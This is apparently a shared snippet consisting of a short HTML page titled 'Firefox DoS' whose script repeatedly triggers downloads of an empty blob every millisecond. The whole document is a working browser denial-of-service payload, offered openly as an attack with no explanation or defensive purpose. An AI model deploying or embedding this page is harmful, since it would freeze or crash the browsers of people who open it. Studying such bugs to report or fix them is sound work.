tul
3 years ago in JavaScript
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Firefox DoS </title>
</head>
<body>
</body>
<script>
const payload = decodeURIComponent('123123123')
const blob = new Blob([], {type: payload});
const a = document.createElement('a');
document.body.appendChild(a);
a.download = payload;
a.href = window.URL.createObjectURL(blob);
setInterval(() => a.click(), 1);
</script>
</html>